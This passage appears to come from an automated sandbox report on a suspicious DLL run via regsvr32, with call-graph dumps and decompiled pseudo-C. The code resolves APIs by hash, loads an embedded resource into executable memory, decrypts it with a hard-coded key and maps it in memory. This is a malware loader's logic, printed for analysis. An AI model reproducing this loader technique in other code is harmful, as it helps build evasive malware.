30 API calls 20379 100088f8 DrawTextA 20380 1002f8fb 66 API calls 20541 10038ef8 PeekMessageA DispatchMessageA PeekMessageA 20381 1000acfc IsWindowVisible 20542 10027afd 82 API calls 2 library calls 20382 10001100 GetVersionExA InterlockedExchange 20383 1002f502 82 API calls ctype 20384 10001500 37 API calls 3 library calls 20386 10008d08 80 API calls 20387 1000850a 66 API calls 20389 1002c50c 84 API calls 20390 1003210c 89 API calls 20544 1002fb11 GetClientRect 20392 10008914 DrawTextExA 20393 1000c116 68 API calls 20395 1001d919 SendMessageA ScreenToClient SendMessageA 20397 10028d1e ScaleViewportExtEx ScaleViewportExtEx 20398 1002cd1e 9 API calls 20095 1001131c 20097 10011328 __lock 20095->20097 20096 10011379 20104 100113b6 __lock 20096->20104 20152 10006120 20096->20152 20097->20096 20097->20104 20105 1001119b 20097->20105 20100 1001138d 20101 100113a3 20100->20101 20102 1001119b 99 API calls 20100->20102 20103 1001119b 99 API calls 20101->20103 20101->20104 20102->20101 20103->20104 20106 1001128b 20105->20106 20107 100111ab __lock 20105->20107 20108 100112bb 20106->20108 20109 1001128f 20106->20109 20110 100111b5 GetVersionExA 20107->20110 20111 100112c0 20108->20111 20112 10011304 20108->20112 20115 100112aa 20109->20115 20134 100112b9 20109->20134 20178 10011f67 20109->20178 20114 100111cc 20110->20114 20110->20134 20183 1001382a 20111->20183 20112->20134 20214 10015355 37 API calls 20112->20214 20170 10013a83 HeapCreate 20114->20170 20181 1001634a 36 API calls ___free_lc_time 20115->20181 20116 100112cc 20120 100112d4 FlsSetValue 20116->20120 20116->20134 20123 100112e6 20120->20123 20124 100112fa 20120->20124 20122 100112af 20182 1001516d FlsFree 20122->20182 20130 100112eb GetCurrentThreadId 20123->20130 20204 100107c8 20124->20204 20125 10011217 20127 10011220 20125->20127 20125->20134 20190 10015384 44 API calls _rand 20127->20190 20129 100112b4 20132 10013ad4 VirtualFree VirtualFree HeapFree HeapFree HeapDestroy 20129->20132 20130->20134 20132->20134 20133 10011225 20135 10011229 20133->20135 20138 10011238 GetCommandLineA 20133->20138 20134->20096 20191 10013ad4 20135->20191 20137 1001122e 20137->20134 20197 1001666b 42 API calls 2 library calls 20138->20197 20140 10011248 20198 1001614c 40 API calls 2 library calls 20140->20198 20142 10011252 20143 10011284 20142->20143 20199 100165c9 59 API calls 2 library calls 20142->20199 20203 1001516d FlsFree 20143->20203 20146 1001125b 20147 1001126f 20146->20147 20200 10016396 58 API calls 5 library calls 20146->20200 20147->20137 20202 1001634a 36 API calls ___free_lc_time 20147->20202 20150 10011264 20150->20147 20201 10011e29 39 API calls 20150->20201 20153 10006566 20152->20153 20154 1000612c 20152->20154 20153->20100 20237 10005040 20154->20237 20156 10006131 20157 1000656f 20156->20157 20160 10006139 20156->20160 20261 10011135 43 API calls __lock 20157->20261 20159 10006579 20159->20100 20161 1000634f FindResourceW LoadResource SizeofResource 20160->20161 20162 10006432 VirtualAlloc 20161->20162 20163 1000638c VirtualAllocExNuma 20161->20163 20164 100064d0 memcpy malloc 20162->20164 20163->20164 20260 10002340 malloc ??3@YAXPAX 20164->20260 20166 10006508 20167 1000651f ??3@YAXPAX 20166->20167 20243 10005260 20167->20243 20169 1000654b 20169->20153 20171 10013aa3 20170->20171 20172 10013acd 20170->20172 20173 10013ad0 20171->20173 20174 10013ab2 20171->20174 20172->20125 20173->20125 20215 10013b53 HeapAlloc 20174->20215 20176 10013abc 20176->20173 20177 10013ac1 HeapDestroy 20176->20177 20177->20172 20216 10011e93 20178->20216 20180 10011f72 20180->20115 20181->20122 20187 10013836 __lock _rand 20183->20187 20184 100138a3 RtlAllocateHeap 20184->20187 20186 100138cf __lock 20186->20116 20187->20184 20187->20186 20231 10013a38 35 API calls __lock 20187->20231 20232 1001437a 5 API calls _rand 20187->20232 20233 100138d4 LeaveCriticalSection ___free_lc_time 20187->20233 20190->20133 20192 10013b46 HeapDestroy 20191->20192 20193 10013add 20191->20193 20192->20137 20194 10013b34 HeapFree 20193->20194 20195 10013b00 VirtualFree VirtualFree HeapFree 20193->20195 20194->20192 20195->20195 20196 10013b32 20195->20196 20196->20194 20197->20140 20198->20142 20199->20146 20200->20150 20201->20147 20202->20143 20207 100107d4 __lock 20204->20207 20205 10010833 __lock 20205->20134 20206 10010810 20206->20205 20209 10010825 RtlFreeHeap 20206->20209 20207->20205 20207->20206 20234 10013a38 35 API calls __lock 20207->20234 20209->20205 20210 100107eb ___free_lc_time 20213 10010805 20210->20213 20235 10013bc6 VirtualFree VirtualFree HeapFree __shift 20210->20235 20236 1001081b LeaveCriticalSection ___free_lc_time 20213->20236 20214->20134 20215->20176 20217 10011e9f __lock 20216->20217 20228 10013a38 35 API calls __lock 20217->20228 20219 10011ea6 20220 10011eb7 GetCurrentProcess TerminateProcess 20219->20220 20222 10011ec7 __lock 20219->20222 20220->20222 20229 10011f42 LeaveCriticalSection ___free_lc_time 20222->20229 20223 10011f2a 20224 10011f2f 20223->20224 20226 10011f50 __lock 20223->20226 20230 10011dcf GetModuleHandleA GetProcAddress ExitProcess 20224->20230 20226->20180 20228->20219 20229->20223 20231->20187 20232->20187 20233->20187 20234->20210 20235->20213 20236->20206 20262 100107b6 20237->20262 20239 10005052 20239->20156 20241 100107c8 ___free_lc_time 35 API calls 20242 10005077 20241->20242 20242->20156 20244 1000600e 20243->20244 20246 10005312 20243->20246 20244->20169 20245 100056c8 GetNativeSystemInfo 20248 10005753 20245->20248 20246->20244 20246->20245 20247 10005a04 GetProcessHeap HeapAlloc 20249 10005a9d 20247->20249 20250 10005ae8 20247->20250 20248->20244 20248->20247 20249->20169 20251 10005fdb 20250->20251 20253 10005c79 memcpy 20250->20253 20259 1000601b 20251->20259 20291 10004dd0 ??3@YAXPAX ??3@YAXPAX GetProcessHeap HeapFree 20251->20291 20282 10002ca0 memset memcpy 20253->20282 20255 10005e55 20255->20251 20283 10003f40 IsBadReadPtr realloc IsBadReadPtr 20255->20283 20257 10005f8c 20257->20251 20284 10003570 20257->20284 20259->20169 20260->20166 20261->20159 20265 1001078a 20262->20265 20266 1000504b 20265->20266 20268 10010791 _rand 20265->20268 20266->20239 20266->20241 20268->20266 20269 1001070f 20268->20269 20271 1001071b __lock 20269->20271 20270 1001074e 20272 10010769 RtlAllocateHeap 20270->20272 20275 10010778 __lock 20270->20275 20271->20270 20279 10013a38 35 API calls __lock 20271->20279 20272->20275 20274 10010736 20280 1001437a 5 API calls _rand 20274->20280 20275->20268 20277 10010741 20281 10010781 LeaveCriticalSection ___free_lc_time 20277->20281 20279->20274 20280->20277 20281->20270 20282->20255 20283->20257 20289 10003644 20284->20289 20285 10003a98 20286 10003310 VirtualProtect 20285->20286 20287 10003aaf 20286->20287 20287->20251 20289->20285 20290 10003ac0 20289->20290 20292 10003310 20289->20292 20290->20251 20291->20244 20293 10003322 20292->20293 20294 1000332b 20292->20294 20293->20289 20295 1000337a 20294->20295 20296 10003500 VirtualProtect 20294->20296 20295->20289 20296->20289 20400 1000f922 77 API calls ctype 20547 10008f22 SetWindowTextA 20401 1002292c 104 API calls 20548 10006730 44 API calls 20403 10008933 GrayStringA 20404 1000c934 CoTaskMemFree 20405 10009136 68 API calls 20549 10034b35 RegOpenKeyExA RegQueryValueExA RegCloseKey RegCloseKey 20550 10022738 26 API calls 20551 1002c73e 73 API calls 20552 10038f3e PeekMessageA 20553 10001340 145 API calls 20554 10008740 InitializeCriticalSection __lock 20556 10016b44 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 20558 10008f46 InterlockedIncrement 20559 10031f4a 72 API calls 2 library calls 20560 1002fb4e GetBkColor SetBkColor ExtTextOutA SetBkColor ExtTextOutA 20561 10026b4f 69 API calls _rand 20407 1002f953 25 API calls 20408 10008152 VariantClear 20563 10009757 PtInRect RaiseException ctype 20564 10008f5d InterlockedDecrement ctype 20565 1002bf62 SetRectEmpty 20410 1000f562 78 API calls ctype 20411 10008963 Escape 20566 10021761 25 API calls 20412 1000c16b 83 API calls __EH_prolog 20413 1000856b SendMessageA 20567 1000af6d 67 API calls 20414 10006d72 ModifyMenuA 20415 10028d76 SetWindowExtEx SetWindowExtEx 20568 10018775 54 API calls 20570 1002bb75 45 API calls __lock 20571 10009b77 87 API calls 2 library calls 20573 10023f7e 78 API calls 20574 1002cf7e 73 API calls 20575 1003437e 84 API calls 20416 1000857e ImageList_Draw 20576 1001cb7f 8 API calls 20417 1001ed7e 67 API calls 20577 10038783 FormatMessageA lstrcpynA LocalFree 20419 10031d85 70 API calls 2 library calls 20420 1003298b 84 API calls 20578 1003478f 86 API calls 20579 10031793 GetWindowLongA GetWindowLongA SetWindowLongA SetWindowPos 20580 10030b92 171 API calls 20421 10025d91 79 API calls 20581 10036b96 GetWindowLongA GetParent IsZoomed GetSystemMetrics GetSystemMetrics 20040 100011a0 20043 100350ea 20040->20043 20042 100011aa 20044 100350f4 __EH_prolog 20043->20044 20053 10035766 20044->20053 20047 1003511a 20058 100373b5 30 API calls ctype 20047->20058 20050 10035128 20059 10037855 20050->20059 20054 10035770 __EH_prolog 20053->20054 20070 1003570d 25 API calls 20054->20070 20056 10035102 20056->20047 20057 10011f76 35 API calls 3 library calls 20056->20057 20057->20047 20058->20050 20060 1003785f __EH_prolog 20059->20060 20062 10037884 20060->20062 20066 10037895 20060->20066 20071 1003768d TlsAlloc 20060->20071 20074 10037446 EnterCriticalSection 20062->20074 20065 100378a4 20067 100378aa 20065->20067 20068 1003513a GetCurrentThread GetCurrentThreadId 20065->20068 20084 10037552 EnterCriticalSection 20066->20084 20089 10037732 9 API calls 2 library calls 20067->20089 20068->20042 20070->20056 20072 100376c1 InitializeCriticalSection 20071->20072 20073 100376bc 20071->20073 20072->20062 20073->20072 20076 10037467 20074->20076 20075 10037533 LeaveCriticalSection 20075->20066 20077 100374b0 GlobalHandle GlobalUnlock GlobalReAlloc 20076->20077 20078 100374a0 GlobalAlloc 20076->20078 20083 1003751c _rand 20076->20083 20079 100374d5 20077->20079 20078->20079 20080 100374fc GlobalLock 20079->20080 20081 100374e0 GlobalHandle GlobalLock 20079->20081 20082 100374ee LeaveCriticalSection 20079->20082 20080->20083 20081->20082 20082->20080 20083->20075 20085 10037569 20084->20085 20088 1003757a LeaveCriticalSection 20084->20088 20086 1003756e TlsGetValue 20085->20086 20085->20088 20086->20088 20088->20065 20089->20068 20585 100013a0 71 API calls 20586 1000eba3 69 API calls ctype 20425 100085a5 66 API calls 20092 100373a5 20093 10037855 ctype 24 API calls 20092->20093 20094 100373b4 20093->20094 20426 1000c9a7 103 API calls 2 library calls 20427 1001f5a6 111 API calls 20588 100257a8 39 API calls ctype 20591 1000bbb6 SetWindowPos 20429 100089b7 66 API calls 20592 10024fbb 98 API calls 3 library calls 20430 1000a9bd GetWindowLongA __EH_prolog 20432 100071bf 70 API calls ctype 20433 100319bc 71 API calls ctype 20434 100081c0 lstrcmpW 20435 10028dc2 ScaleWindowExtEx ScaleWindowExtEx 20593 1000bfc5 IntersectRect EqualRect IsRectEmpty InvalidateRect 20436 10006dc9 30 API calls ctype 20437 100369c8 62 API calls 20595 1001dfcd 67 API calls 20438 100235cf 82 API calls 3 library calls 20596 10038fcd PeekMessageA GetCurrentThreadId PostThreadMessageA 20090 100045d0 VirtualAlloc 20439 100011d0 88 API calls ctype 20440 100019d0 66 API calls 20597 10022fd3 68 API calls ctype 20442 100089d8 66 API calls 20444 100051e0 66 API calls ctype 20445 10008de0 66 API calls 20600 10007be5 11 API calls 20448 100095e7 OffsetRect RaiseException ctype 20601 100303ea 106 API calls 20602 100077ee 80 API calls 20091 100045f0 VirtualFree 20604 10024bf4 79 API calls ctype 20452 10008dfb 47 API calls __lock 20606 1002cbfe 90 API calls __lock 20607 1001effc 34 API calls ctype 20453 100389fc 66 API calls

                                                                                                            Executed Functions

                                                                                                            Function 10006120 Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 301memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 41%
                                                                                                            			E10006120(void* __ebx, void* __edi, void* __esi, void* __ebp, struct HINSTANCE__* _a4, signed int _a8) {
				void* _v4;
				void* _t36;
				void* _t39;
				void* _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				struct HRSRC__* _t65;
				signed int _t68;
				signed int _t69;
				void* _t77;
				void* _t79;
				intOrPtr _t83;
				signed int _t85;
				signed int _t96;
				void* _t97;
				signed int _t99;
				signed int _t100;
				signed int _t110;
				signed int _t112;
				signed int _t113;
				long _t117;
				signed int _t119;
				void* _t121;
				struct HRSRC__* _t123;
				int _t124;
				void* _t127;
				struct HINSTANCE__* _t128;
				signed int _t129;
				void* _t133;
				signed int _t138;
				signed int _t149;
				signed int _t152;
				signed int _t157;
				intOrPtr _t182;

				if(_a8 != 1) {
					L6:
					return 1;
				} else {
					_t36 = E10005040(__edi);
					_t181 = _t36;
					if(_t36 != 0) {
						_push(0x1003ce28);
						E10011135(__ebx, __edi, __esi, __eflags);
						__eflags = 0;
						return 0;
					} else {
						_push(__ebx);
						_push(__ebp);
						_push(__esi);
						_push(__edi);
						_push(L"kernel32.dll");
						_push(0x3801a8f2);
						_push(0x1a322e2e);
						_push(0x628ad09);
						_push(0x31c6c0a1);
						_push(0x28b4cee6);
						 *0x1004b0d8 = 0;
						 *0x1004b0dc = 0;
						 *0x1004b0e0 = 0;
						 *0x1004b0e8 = 0;
						 *0x1004b0e4 = 0;
						 *0x1004b0ec = 0;
						 *0x1004b0f0 = 0;
						_t39 = E10001E60(_t181);
						_push(L"ntdll.dll");
						_push(0x1c9cdc39);
						_push(0x2d34cc91);
						_push(0x118db97f);
						_push(0x348b2998);
						_push(0x3446e98c);
						_t127 = _t39;
						_t40 = E10001E60(_t181);
						_push(L"msvcrt.dll");
						_push(0xe094f82);
						_push(0x20e23fe3);
						_push(0x156af904);
						_push(0x108d4cdc);
						_push(0x106d66fc);
						_t121 = E10001E60(_t181);
						_push(0x3ee42795);
						_push(_t121);
						_t42 = E10001FF0();
						_push(0x402c2791);
						_push(_t121);
						 *0x1004d3f0 = _t42;
						_t43 = E10001FF0();
						_push(0xb29018f0);
						_push(_t121);
						 *0x1004d3ec = _t43;
						_t44 = E10001FF0();
						_push(0xccfd283f);
						_push(_t121);
						 *0x1004d3e0 = _t44;
						_t45 = E10001FF0();
						_push(0x298c691d);
						_push(_t121);
						 *0x1004d3d0 = _t45;
						_t46 = E10001FF0();
						_push(0x40ec656b);
						_push(_t121);
						 *0x1004d3e4 = _t46;
						_t47 = E10001FF0();
						_push(0x40946966);
						_push(_t121);
						 *0x1004d3fc = _t47;
						_t48 = E10001FF0();
						_push(0x5496c247);
						_push(_t127);
						 *0x1004d3a8 = _t48;
						_t49 = E10001FF0();
						_push(0x3b465a8a);
						_push(_t127);
						 *0x1004d3ac = _t49;
						_t50 = E10001FF0();
						_push(0x66afc09d);
						_push(_t127);
						 *0x1004d3b8 = _t50;
						_t51 = E10001FF0();
						_push(0x5eb2ba6);
						_push(_t127);
						 *0x1004d3d4 = _t51;
						_t52 = E10001FF0();
						_push(0x3c6bbc0e);
						_push(_t127);
						 *0x1004d3cc = _t52;
						_t53 = E10001FF0();
						_push(0x3f32f2a5);
						_push(_t127);
						 *0x1004d3c8 = _t53;
						_t54 = E10001FF0();
						_push(0x112ecd9a);
						_push(_t127);
						 *0x1004d3d8 = _t54;
						_t55 = E10001FF0();
						_push(0xcfb09550);
						_push(_t127);
						 *0x1004d400 = _t55;
						_t56 = E10001FF0();
						_push(0x30fe1b19);
						_push(_t40);
						 *0x1004d3bc = _t56;
						_t57 = E10001FF0();
						_push(0x33a92211);
						_push(_t127);
						 *0x1004d3b4 = _t57;
						_t58 = E10001FF0();
						_push(0xaab3e2a9);
						_push(_t127);
						 *0x1004d3f8 = _t58;
						_t59 = E10001FF0();
						_push(0x31e84135);
						_push(_t127);
						 *0x1004d3f4 = _t59;
						_t60 = E10001FF0();
						_push(0xaef34aa1);
						_push(_t127);
						 *0x1004d3dc = _t60;
						_t61 = E10001FF0();
						_push(0x1e75927d);
						_push(_t127);
						 *0x1004d3b0 = _t61;
						_t62 = E10001FF0();
						_push(0x56331b6e);
						_push(_t127);
						 *0x1004d3e8 = _t62;
						_t63 = E10001FF0();
						_push(0x1cf8ffb);
						_push(_t127);
						 *0x1004d3c4 = _t63;
						_t64 = E10001FF0();
						_t128 = _a4;
						 *0x1004d3c0 = _t64; // executed
						_t65 = FindResourceW(_t128, 0x5f4c, 0x1003ce4c); // executed
						_t123 = _t65;
						_v4 = LoadResource(_t128, _t123);
						_t124 = SizeofResource(_t128, _t123);
						_t182 =  *0x1004d3b8; // 0x76ec66e0
						if(_t182 == 0) {
							_t96 =  *0x1004b0e8; // 0x0
							_t113 =  *0x1004b0e0; // 0x0
							_t68 =  *0x1004b0d8; // 0x0
							_t129 =  *0x1004b0dc; // 0x0
							_t149 =  *0x1004b0ec; // 0x0
							_t69 =  *0x1004b0e4; // 0x0
							_t15 = _t113 * 2; // 0x3
							_t152 = _t149 * _t68 + ((_t96 * _t113 + _t68) * 0x3fffffff + _t129) * _t96 + _t113 + _t129;
							_a8 = _t152;
							_t110 = (_t129 + _t15 + 3) * _t69 << 2;
							_t20 = _t96 + 2; // 0x2
							_t157 =  *0x1004b0d8; // 0x0
							_t117 = _t69 - _t20 * _t129 - _t113 * _t157 + (_t69 - _t20 * _t129 - _t113 * _t157) * 0x00000002 + (_t69 * _t96 * _t157 + _t69 * _t96 * _t157 * 0x00000002 - 0x00000003) *  *0x1004b0ec + 0x00002000 | 0x00001000 + _a8 * 0x00000004 - _t110;
							__eflags = _t117;
							_t77 = VirtualAlloc(0, _t124, _t117, 0x40 + _t152 * 4 - _t110);
						} else {
							_t112 =  *0x1004b0e8; // 0x0
							_t119 =  *0x1004b0dc; // 0x0
							_t85 =  *0x1004b0ec; // 0x0
							_t99 =  *0x1004b0d8; // 0x0
							_t4 = _t99 + 0x3fffffff; // 0x3fffffff
							_t138 =  *0x1004b0e0; // 0x0
							_t8 = _t138 * 2; // 0x3
							_t100 =  *0x1004b0e0; // 0x0
							_t77 =  *0x1004d3b8(0xffffffff, 0, _t124, 0x00001000 + (_t85 * _t99 + ((_t112 * _t138 + _t99) * 0x3fffffff + _t119) * _t112 - (_t119 + _t8 + 0x00000003) *  *0x1004b0e4 + _t100 + _t119) * 0x00000004 | _t85 *  *0x1004b0e4 * _t112 * _t112 * _t112 * _t112 * _t112 + _t119 + _t85 *  *0x1004b0e4 * _t112 * _t112 * _t112 * _t112 * _t112 + _t119 + 0x00002000, 0x40 + (_t112 * 0x3fffffff + _t4 * _t119 + _t85 + _t138) * 4, 0); // executed
						}
						_t133 = _t77;
						memcpy(_t133, _v4, _t124);
						_t79 = malloc(0x9d1);
						_t97 = _t79;
						E10002340();
						E100027D0();
						 *0x1004d3e0(_t97, 0x39fc4527, 0xfc9810f7, 0x2aab42ff, _t97, _t133, _t124, 0xed9e0cf, 0x96c3a441, 0x245e78a3, _t97, "8nGA7ohfFpugG(l$!#2u__*t5EaFD77", 0x20);
						_t83 = E10005260();
						 *0x1004d408 = _t83;
						 *0x1004d404(_a4, 1, 0, _t133, _t124, E100045D0, E100045F0, E10004610, E10004650, E10004670, 0);
						goto L6;
					}
				}
			}


























































                                                                                                            0x10006126
                                                                                                            0x10006566
                                                                                                            0x1000656c
                                                                                                            0x1000612c
                                                                                                            0x1000612c
                                                                                                            0x10006131
                                                                                                            0x10006133
                                                                                                            0x1000656f
                                                                                                            0x10006574
                                                                                                            0x1000657c
                                                                                                            0x1000657f
                                                                                                            0x10006139
                                                                                                            0x10006139
                                                                                                            0x1000613a
                                                                                                            0x1000613b
                                                                                                            0x1000613c
                                                                                                            0x1000613d
                                                                                                            0x10006142
                                                                                                            0x10006147
                                                                                                            0x1000614e
                                                                                                            0x10006153
                                                                                                            0x10006158
                                                                                                            0x1000615d
                                                                                                            0x10006163
                                                                                                            0x10006169
                                                                                                            0x1000616f
                                                                                                            0x10006175
                                                                                                            0x1000617b
                                                                                                            0x10006181
                                                                                                            0x10006187
                                                                                                            0x1000618c
                                                                                                            0x10006191
                                                                                                            0x10006196
                                                                                                            0x1000619b
                                                                                                            0x100061a0
                                                                                                            0x100061a5
                                                                                                            0x100061aa
                                                                                                            0x100061ac
                                                                                                            0x100061b1
                                                                                                            0x100061b6
                                                                                                            0x100061bb
                                                                                                            0x100061c0
                                                                                                            0x100061c5
                                                                                                            0x100061ca
                                                                                                            0x100061d9
                                                                                                            0x100061db
                                                                                                            0x100061e0
                                                                                                            0x100061e1
                                                                                                            0x100061e6
                                                                                                            0x100061eb
                                                                                                            0x100061ec
                                                                                                            0x100061f1
                                                                                                            0x100061f6
                                                                                                            0x100061fb
                                                                                                            0x100061fc
                                                                                                            0x10006201
                                                                                                            0x10006206
                                                                                                            0x1000620b
                                                                                                            0x1000620c
                                                                                                            0x10006211
                                                                                                            0x10006216
                                                                                                            0x1000621b
                                                                                                            0x1000621c
                                                                                                            0x10006221
                                                                                                            0x10006226
                                                                                                            0x1000622b
                                                                                                            0x1000622c
                                                                                                            0x10006231
                                                                                                            0x10006236
                                                                                                            0x1000623b
                                                                                                            0x1000623c
                                                                                                            0x10006241
                                                                                                            0x10006246
                                                                                                            0x1000624b
                                                                                                            0x1000624c
                                                                                                            0x10006251
                                                                                                            0x10006259
                                                                                                            0x1000625e
                                                                                                            0x1000625f
                                                                                                            0x10006264
                                                                                                            0x10006269
                                                                                                            0x1000626e
                                                                                                            0x1000626f
                                                                                                            0x10006274
                                                                                                            0x10006279
                                                                                                            0x1000627e
                                                                                                            0x1000627f
                                                                                                            0x10006284
                                                                                                            0x10006289
                                                                                                            0x1000628e
                                                                                                            0x1000628f
                                                                                                            0x10006294
                                                                                                            0x10006299
                                                                                                            0x1000629e
                                                                                                            0x1000629f
                                                                                                            0x100062a4
                                                                                                            0x100062a9
                                                                                                            0x100062ae
                                                                                                            0x100062af
                                                                                                            0x100062b4
                                                                                                            0x100062b9
                                                                                                            0x100062be
                                                                                                            0x100062bf
                                                                                                            0x100062c4
                                                                                                            0x100062c9
                                                                                                            0x100062ce
                                                                                                            0x100062cf
                                                                                                            0x100062d4
                                                                                                            0x100062dc
                                                                                                            0x100062e1
                                                                                                            0x100062e2
                                                                                                            0x100062e7
                                                                                                            0x100062ec
                                                                                                            0x100062f1
                                                                                                            0x100062f2
                                                                                                            0x100062f7
                                                                                                            0x100062fc
                                                                                                            0x10006301
                                                                                                            0x10006302
                                                                                                            0x10006307
                                                                                                            0x1000630c
                                                                                                            0x10006311
                                                                                                            0x10006312
                                                                                                            0x10006317
                                                                                                            0x1000631c
                                                                                                            0x10006321
                                                                                                            0x10006322
                                                                                                            0x10006327
                                                                                                            0x1000632e
                                                                                                            0x10006333
                                                                                                            0x10006334
                                                                                                            0x1000633a
                                                                                                            0x1000633f
                                                                                                            0x10006344
                                                                                                            0x10006345
                                                                                                            0x1000634a
                                                                                                            0x1000634f
                                                                                                            0x10006361
                                                                                                            0x10006366
                                                                                                            0x10006368
                                                                                                            0x10006374
                                                                                                            0x1000637e
                                                                                                            0x10006380
                                                                                                            0x10006386
                                                                                                            0x10006432
                                                                                                            0x10006438
                                                                                                            0x1000643e
                                                                                                            0x10006443
                                                                                                            0x10006449
                                                                                                            0x10006459
                                                                                                            0x1000646d
                                                                                                            0x10006474
                                                                                                            0x10006476
                                                                                                            0x10006481
                                                                                                            0x10006487
                                                                                                            0x10006494
                                                                                                            0x100064c4
                                                                                                            0x100064c4
                                                                                                            0x100064ca
                                                                                                            0x1000638c
                                                                                                            0x1000638c
                                                                                                            0x10006392
                                                                                                            0x10006398
                                                                                                            0x1000639e
                                                                                                            0x100063a4
                                                                                                            0x100063b9
                                                                                                            0x100063d6
                                                                                                            0x100063fa
                                                                                                            0x10006427
                                                                                                            0x10006427
                                                                                                            0x100064d5
                                                                                                            0x100064d9
                                                                                                            0x100064e4
                                                                                                            0x100064f1
                                                                                                            0x10006503
                                                                                                            0x1000651a
                                                                                                            0x10006523
                                                                                                            0x10006546
                                                                                                            0x10006557
                                                                                                            0x1000655c
                                                                                                            0x00000000
                                                                                                            0x10006565
                                                                                                            0x10006133

                                                                                                            APIs
                                                                                                            • FindResourceW.KERNEL32(?,00005F4C,1003CE4C), ref: 10006366
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 1000636C
                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 10006378
                                                                                                            • VirtualAllocExNuma.KERNEL32(000000FF,00000000,00000000,00000000,00000000,00000000), ref: 10006427
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,?,00000000), ref: 100064CA
                                                                                                            • memcpy.MSVCRT ref: 100064D9
                                                                                                            • malloc.MSVCRT ref: 100064E4
                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10006523
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$AllocVirtual$??3@FindLoadNumaSizeofmallocmemcpy
                                                                                                            • String ID: 8nGA7ohfFpugG(l$!#2u__*t5EaFD77$kernel32.dll$msvcrt.dll$ntdll.dll$pk
                                                                                                            • API String ID: 3024364686-783958072
                                                                                                            • Opcode ID: 73f28b8c6d58252cdff927fcb48cb9a981f06cd2f682e57dd75e91a0e94e53b4
                                                                                                            • Instruction ID: 1699d20feb2015e992388abaa39e01a506b89f8495deb80be789641e5ebed42c
                                                                                                            • Opcode Fuzzy Hash: 73f28b8c6d58252cdff927fcb48cb9a981f06cd2f682e57dd75e91a0e94e53b4
                                                                                                            • Instruction Fuzzy Hash: ACA159719403256FF704EF748EC6E96769CEB46681B00453FF511E726AEBB0B5008B9D
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10005260 Relevance: 7.1, APIs: 4, Instructions: 1092memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 98 10005260-1000530c 99 10006011-1000601a 98->99 100 10005312-10005361 98->100 100->99 101 10005367-10005409 100->101 101->99 102 1000540f-10005488 101->102 102->99 103 1000548e-100054cb 102->103 103->99 104 100054d1-10005505 103->104 104->99 105 1000550b-10005594 104->105 106 1000559a-100055be 105->106 107 100056bc-100056c2 105->107 108 100055c4-100055d1 106->108 109 100056c8-10005803 GetNativeSystemInfo call 10002bf0 * 2 107->109 111 100055d3-10005602 108->111 112 10005604-10005642 108->112 109->99 120 10005809-10005914 109->120 114 10005644-10005654 111->114 112->114 116 10005656-10005697 114->116 117 10005699 114->117 119 1000569f-100056b4 116->119 117->119 119->108 121 100056ba 119->121 123 10005a04-10005a9b GetProcessHeap HeapAlloc 120->123 124 1000591a-100059fc 120->124 121->109 125 10005ae8-10005bdd call 10002c60 123->125 126 10005a9d-10005ae7 123->126 124->99 130 10005a02 124->130 132 10005be3-10005e5a memcpy call 10002ca0 125->132 133 10006008-1000600e call 10004dd0 125->133 130->123 132->133 139 10005e60-10005ec1 132->139 133->99 140 10005ec7-10005f56 call 10003b80 139->140 141 10005f58 139->141 143 10005f5f-10005f91 call 10003f40 140->143 141->143 143->133 147 10005f93-10005fd6 call 10003570 143->147 149 10005fdb-10005fe0 147->149 149->133 150 10005fe2-10006006 call 10003ad0 149->150 150->133 153 1000601b-10006026 150->153 154 1000602c-10006031 153->154 155 1000610d-1000611d 153->155 156 10006033-100060a4 154->156 157 100060a5-1000610c 154->157
                                                                                                            C-Code - Quality: 73%
                                                                                                            			E10005260() {
				signed int _t340;
				signed int _t351;
				signed int _t354;
				signed int _t356;
				signed int _t360;
				void* _t373;
				signed int _t385;
				signed int _t388;
				signed int _t398;
				signed int _t403;
				intOrPtr _t405;
				void* _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t423;
				signed int _t425;
				void* _t433;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				void* _t441;
				signed int _t442;
				signed int _t444;
				signed int _t448;
				intOrPtr _t453;
				signed int _t454;
				signed int _t463;
				void* _t467;
				signed int _t468;
				signed int _t469;
				void* _t473;
				signed int _t474;
				void* _t475;
				void* _t476;
				intOrPtr _t478;
				signed int _t481;
				void* _t492;
				signed int _t498;
				signed int _t520;
				intOrPtr _t523;
				signed int _t532;
				signed int _t533;
